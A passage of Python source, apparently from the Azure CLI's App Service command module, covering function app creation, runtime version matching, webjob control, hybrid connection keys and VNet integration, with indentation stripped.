else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_tier(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
parsed_plan = parse_resource_id(app.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
client=client, extra_parameter=app)
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
